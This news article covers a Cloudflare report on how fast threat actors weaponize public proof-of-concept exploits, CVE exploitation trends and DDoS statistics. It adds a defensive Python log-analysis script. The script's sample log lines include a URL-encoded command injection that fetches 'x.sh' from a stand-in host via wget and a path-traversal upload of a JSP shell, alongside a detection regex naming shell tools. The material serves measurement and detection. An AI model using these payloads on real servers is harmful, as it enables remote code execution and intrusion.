15 July 2024

Threat actors weaponize PoCs 22 minutes after public release


Proof of concept (PoC) exploits are being rapidly weaponized by threat actors, sometimes within just 22 minutes of their public release, recent research from Cloudflare reveals.

While Distributed Denial-of-Service (DDoS) attacks remain the primary attack vector against web applications, attacks targeting specific Common Vulnerabilities and Exposures (CVEs) are becoming increasingly prevalent, as evidenced by the near-immediate exploitation attempts that follow PoC releases.

In 2023 alone, 97 zero-day vulnerabilities were exploited in the wild, alongside a 15% increase in disclosed CVEs from the previous year.

When examining CVE exploitation attempts, Cloudflare observed primarily scanning activity, followed by command injections and exploitation attempts against vulnerabilities with publicly available PoCs. Notable CVEs under active exploitation include CVE-2023-50164 (Apache Struts) and CVE-2022-33891 (Apache Spark), CVE-2023-29298, CVE-2023-38203 and CVE-2023-26360 (Adobe ColdFusion), and CVE-2023-35082 (Ivanti EPMM, formerly MobileIron Core).

“The speed of exploitation of disclosed CVEs is often quicker than the speed at which humans can create WAF rules or create and deploy patches to mitigate attacks,” the report explains. “CVE exploitation campaigns from specific threat actors are clearly visible when we focus on a subset of CVE categories. For example, if we filter on CVEs that result in remote code execution (RCE), we see clear attempts to exploit Apache and Adobe installations towards the end of 2023 and start of 2024 along with a notable campaign targeting Citrix in May of this year.”
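The 22-minute figure is a measurement of the gap between PoC publication and the first matching request in telemetry. As an added example that is not part of the Cloudflare report or this article, the script below shows how a defender can take the same measurement over their own web server access logs: it parses a handful of constructed Apache combined-format log lines, sorts each request into the three buckets the report describes (scanning, command injection, PoC-derived signature match), and computes the time from a PoC publication timestamp to the first hit. The PoC signature name `HYPOTHETICAL-POC-UPLOAD-TRAVERSAL`, its regex, the probe path list and the sample log lines are all assumptions constructed for this example; they do not describe any of the CVEs named above.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (Apache "combined" format) for this
# example; they are not data from the Cloudflare report.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Jul/2024:09:58:02 +0000] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
203.0.113.5 - - [15/Jul/2024:09:58:03 +0000] "GET /wp-login.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
198.51.100.7 - - [15/Jul/2024:10:05:10 +0000] "GET /search?q=test HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [15/Jul/2024:10:12:44 +0000] "GET /cgi-bin/status?host=127.0.0.1%3Bwget%20http%3A%2F%2F198.51.100.9%2Fx.sh HTTP/1.1" 200 88 "-" "curl/8.0"
192.0.2.33 - - [15/Jul/2024:10:22:31 +0000] "POST /upload?filename=..%2F..%2Fshell.jsp HTTP/1.1" 200 42 "-" "python-requests/2.31"
"""

# Apache combined-format fields we need: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths that mass scanners probe on every host; a request to one of these from
# a host that does not serve it is classified as scanning activity.
SCAN_PATHS = {"/.env", "/wp-login.php", "/phpinfo.php", "/.git/config", "/actuator/env"}

# Shell metacharacter followed by a command word in a decoded request target.
CMDI_RE = re.compile(r'(?:;|\|\||\||&&|`|\$\()\s*(?:wget|curl|sh|bash|nc|id|whoami|cat|echo)\b')

# Signatures derived from a published PoC. The single entry here is a
# hypothetical placeholder (assumption for this example), not a real CVE.
POC_SIGNATURES = {
    "HYPOTHETICAL-POC-UPLOAD-TRAVERSAL": re.compile(r'/upload\?.*filename=(?:\.\./)+'),
}


def classify(decoded_target: str):
    """Return 'poc:<name>', 'cmdi', 'scan', or None for one decoded request target."""
    for name, sig in POC_SIGNATURES.items():
        if sig.search(decoded_target):
            return f"poc:{name}"
    if CMDI_RE.search(decoded_target):
        return "cmdi"
    if urlsplit(decoded_target).path in SCAN_PATHS:
        return "scan"
    return None


def parse_log(text: str):
    """Parse combined-format lines into dicts with a parsed timestamp and a label."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        decoded = unquote(m.group("target"))
        entries.append({
            "ip": m.group("ip"),
            "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
            "method": m.group("method"),
            "target": decoded,
            "status": int(m.group("status")),
            "label": classify(decoded),
        })
    return entries


def time_to_first_match(entries, label: str, published: datetime):
    """Delta between PoC publication and the first request carrying `label`, or None."""
    hits = sorted(e["ts"] for e in entries if e["label"] == label and e["ts"] >= published)
    return hits[0] - published if hits else None


def summarize(entries):
    """Count requests per label, so the scan / cmdi / poc mix can be reported."""
    counts = {}
    for e in entries:
        counts[e["label"]] = counts.get(e["label"], 0) + 1
    return counts


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    # Assumed PoC publication time for the hypothetical signature.
    published = datetime(2024, 7, 15, 10, 0, tzinfo=timezone.utc)
    print(summarize(entries))
    delta = time_to_first_match(entries, "poc:HYPOTHETICAL-POC-UPLOAD-TRAVERSAL", published)
    print("time to first weaponized request:", delta)
```

The decode step matters: the command injection in the sample is URL-encoded (`%3B` for `;`), so a signature applied to the raw target would miss it. In practice the PoC signature table is the part that has to be populated faster than a human can write it, which is the report's point; the measurement code itself does not change.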

DDoS attacks continue to dominate as the most common attack type against web applications, comprising 37.1% of all mitigated application traffic in the analyzed period. The motives behind these attacks vary, from financial extortion and testing botnet capacity to politically motivated targeting of institutions and countries. For instance, after Sweden's acceptance into the NATO alliance on March 7, 2024, Cloudflare recorded a 466% increase in DDoS attacks against the country.

The scale of DDoS attacks is also on the rise, with the gaming and gambling sectors being the most targeted, followed by internet technology companies and cryptomining operations.

Cloudflare's research also highlights the alarming role of bots in the cyber landscape, with automated traffic comprising about one-third of all observed traffic. 93% of this bot traffic comes from sources not included in Cloudflare's verified bot list and is therefore treated as potentially malicious.

